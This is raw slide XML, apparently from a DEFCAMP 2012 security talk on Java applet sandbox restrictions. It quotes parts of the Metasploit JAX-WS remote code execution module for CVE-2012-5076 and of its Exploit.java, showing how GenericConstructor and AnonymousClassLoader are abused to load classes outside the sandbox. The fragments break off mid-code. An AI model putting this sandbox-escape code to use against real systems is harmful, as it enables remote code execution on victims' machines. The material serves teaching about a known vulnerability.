              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> Access system clipboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> Transfer data from other server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> Load native libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> Change Security Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> Create a Class Loader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" smtClean="0"/>
              <a:t> Read certain system Properties</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="4572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Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://docs.oracle.com/javase/tutorial/deployment/applet/security.html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4825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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit - Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="320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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="57251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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is this 1337?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Metasplo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85800"/>
            <a:ext cx="65024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610600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##</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t># This file is part of the Metasploit Framework and may be subject to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t># redistribution and commercial restrictions. Please see the Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t># web site for more information on licensing and terms of use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#   http://metasploit.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>##</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>require 'msf/core'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>require 'rex'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>Metasploit3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf::Exploit::Remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>Rank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ExcellentRanking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf::Exploit::Remote::HttpServer::HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf::Exploit::Remote::BrowserAutopwn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>autopwn_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>({ :javascript =&gt; false })</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>initialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> = {} )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>super</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>update_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>'          =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Java Applet JAX-WS Remote Code Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>'   =&gt; %q{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                code outside of the sandbox as exploited in the wild in November of 2012. The</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                vulnerability affects Java version 7u7 and earlier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'License</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>'       =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSF_LICENSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>'        =&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>                [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'Unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Vulnerability Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'juan vazquez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t># metasploit module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>                ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:t>...................................................................................</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4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2286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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="320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mtClean="0"/>
              <a:t>paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> = [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>            [ "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>" ],</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>            [ "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MyPayload.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>" ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>        ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regenerate_payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0"/>
              <a:t>cli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0"/>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoded_jar</a:t>
            </a:r>
          </a:p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28600" y="3886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smtClean="0"/>
              <a:t>Links:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4343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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve-2012-5076/Exploit.java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4953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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://metasploit.com/svn/framework3/trunk/external/source/exploits/cve-2012-5076/MyPayload.java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0600" y="152400"/>
            <a:ext cx="38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DEFCAMP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>2012</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2286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rgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cool parts</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="320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>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import com.sun.org.glassfish.gmbal.util.GenericConstructor;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="120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7526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smtClean="0"/>
              <a:t>GenericConstructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> genericconstructor = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GenericConstructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>class, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sun.invoke.anon.AnonymousClassLoader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>", new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>genericconstructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>[] {});                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>Method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ManagedObjectManagerFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>(), "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loadClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>", new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>[] { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byte[].class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>class1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t> = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invoke</a:t>
